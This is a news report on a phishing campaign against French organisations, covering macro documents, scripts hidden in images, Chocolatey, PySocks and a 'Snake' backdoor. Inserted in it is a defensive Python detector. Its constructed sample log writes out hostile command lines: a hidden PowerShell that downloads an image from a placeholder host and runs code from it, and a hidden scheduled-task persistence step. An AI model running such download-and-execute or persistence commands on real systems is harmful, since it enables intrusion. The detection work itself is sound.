Attackers use new methods to hijack French organizations
An advanced cybercriminal has been spotted using innovative and distinctive methods to hijack French entities in the construction, real estate and government sectors.
How the attack unfolds
The attack begins with a well-known technique – emails containing a macro-enabled Microsoft Word document masquerading as GDPR-related information – and ends with an attempt to install a backdoor on the target systems. What happens between these stages, however, is what makes these attacks interesting.
Targeted recipients who download the attached Word document and enable macros trigger a chain of actions involving:
- PowerShell and Python scripts steganographically hidden in images downloaded from a compromised Jamaican credit union website
- Downloading and using Chocolatey, a software management automation tool for Windows that integrates installers, executables, zips, and scripts into compiled packages
- Installing Python, the pip package installer, and PySocks (a reverse proxy client that allows users to send traffic through SOCKS and HTTP proxy servers)
- The “Snake” backdoor, named after the ASCII art in the VBA macro
Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson say this is the first time they’ve seen a threat actor use Chocolatey in campaigns, and that steganography is, in general, rarely used by attackers.
“In addition to the images used in this attack chain, [we] observed and identified additional payloads served from the same host. One of the most exciting is using what Proofpoint considers a new signed binary proxy runtime application using schtasks.exe,” they added. “This includes an attempt to circumvent detection through defensive measures.”
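The chain described above (Word macro spawning PowerShell, image download followed by in-memory execution, a Chocolatey install, pip fetching PySocks, and the schtasks.exe proxy-execution step the researchers mention) is the kind of sequence a defender can look for in process-creation telemetry. The following is an added example, not Proofpoint's code and not anything published with the report: it runs simple heuristics over constructed Sysmon-style process events. The pipe-separated log format, the host names, the placeholder domain `example.invalid` and every command line are assumptions made up for the example.

```python
"""
Heuristic detection for the attack chain described in the article, run
over constructed process-creation events. Each line is assumed to be
"timestamp|host|parent_image|image|command_line" (e.g. Sysmon Event ID 1
exported as text). None of the sample values come from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "python.exe", "cmd.exe", "wscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str    # parent image name, lower-cased
    image: str     # image name, lower-cased
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Split one pipe-separated event; the command line may itself contain pipes."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(ts, host, parent.lower(), image.lower(), cmdline)


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic that fires on this single event."""
    hits: list[str] = []
    cl = ev.cmdline.lower()
    # Macro-enabled document launching a script interpreter.
    if ev.parent in OFFICE_APPS and ev.image in INTERPRETERS:
        hits.append("office_spawns_interpreter")
    # PowerShell fetching an image file and evaluating something from it
    # (a crude proxy for "script hidden in an image"; this is an assumption).
    if ev.image in SHELLS and re.search(r"\.(jpe?g|png|gif|bmp)\b", cl) \
            and re.search(r"\biex\b|invoke-expression|frombase64string", cl):
        hits.append("image_fetch_then_execute")
    # Chocolatey being bootstrapped or used to install packages.
    if "chocolatey" in cl or re.search(r"\bchoco(\.exe)?\s+install\b", cl):
        hits.append("chocolatey_install")
    # pip pulling the PySocks proxy client.
    if re.search(r"\bpip(\d|\.exe)?\s+install\b.*\bpysocks\b", cl):
        hits.append("pip_install_pysocks")
    # schtasks.exe creating a task whose action is a script interpreter.
    if ev.image == "schtasks.exe" and "/create" in cl and \
            re.search(r'/tr\s+"?[^"]*(powershell|pwsh|python|cmd|wscript|mshta)', cl):
        hits.append("schtasks_runs_interpreter")
    return hits


def detect(lines: list[str]) -> list[tuple[int, str, str]]:
    """Return (line_number, host, rule) for every heuristic hit in the log."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in check_event(ev):
            findings.append((n, ev.host, rule))
    return findings


def score_hosts(findings: list[tuple[int, str, str]], min_rules: int = 3) -> dict[str, set[str]]:
    """Hosts on which at least min_rules distinct heuristics fired; single hits are
    noisy on their own (Chocolatey and pip are legitimate admin tools), the chain is not."""
    per_host: dict[str, set[str]] = {}
    for _, host, rule in findings:
        per_host.setdefault(host, set()).add(rule)
    return {h: r for h, r in per_host.items() if len(r) >= min_rules}


# Constructed sample events; not taken from any real incident.
SAMPLE_LOG = [
    r'2022-03-21T09:14:02Z|WS-FR-01|explorer.exe|winword.exe|"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n C:\Users\u\Downloads\RGPD_info.docm',
    r'2022-03-21T09:14:20Z|WS-FR-01|winword.exe|powershell.exe|powershell -w hidden -c $i=(Invoke-WebRequest http://example.invalid/logo.jpg).Content; IEX([Text.Encoding]::ASCII.GetString($i[2048..4096]))',
    r"2022-03-21T09:14:31Z|WS-FR-01|powershell.exe|powershell.exe|powershell -NoP -c iex((New-Object Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))",
    r'2022-03-21T09:15:02Z|WS-FR-01|powershell.exe|choco.exe|choco install python -y',
    r'2022-03-21T09:16:45Z|WS-FR-01|cmd.exe|python.exe|C:\Python310\python.exe -m pip install PySocks',
    r'2022-03-21T09:17:10Z|WS-FR-01|powershell.exe|schtasks.exe|schtasks /create /tn "Updater" /tr "powershell -w hidden -f C:\Users\Public\u.ps1" /sc once /st 00:00',
    r'2022-03-21T09:17:11Z|WS-FR-02|services.exe|svchost.exe|C:\Windows\System32\svchost.exe -k netsvcs',
]

if __name__ == "__main__":
    for n, host, rule in detect(SAMPLE_LOG):
        print(f"line {n} {host}: {rule}")
    print("hosts showing the chain:", score_hosts(detect(SAMPLE_LOG)))
```

Each heuristic on its own is noisy (Chocolatey and pip are ordinary administrative tools), which is why `score_hosts` only reports a host once several distinct stages of the chain have been seen there; in a real deployment the same logic would be expressed as correlation across events rather than a per-line scan.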
Researchers were unable to associate these campaigns with a known group, but the new techniques and specific targeting point to an advanced threat actor, whose ultimate goals cannot be discerned at this time.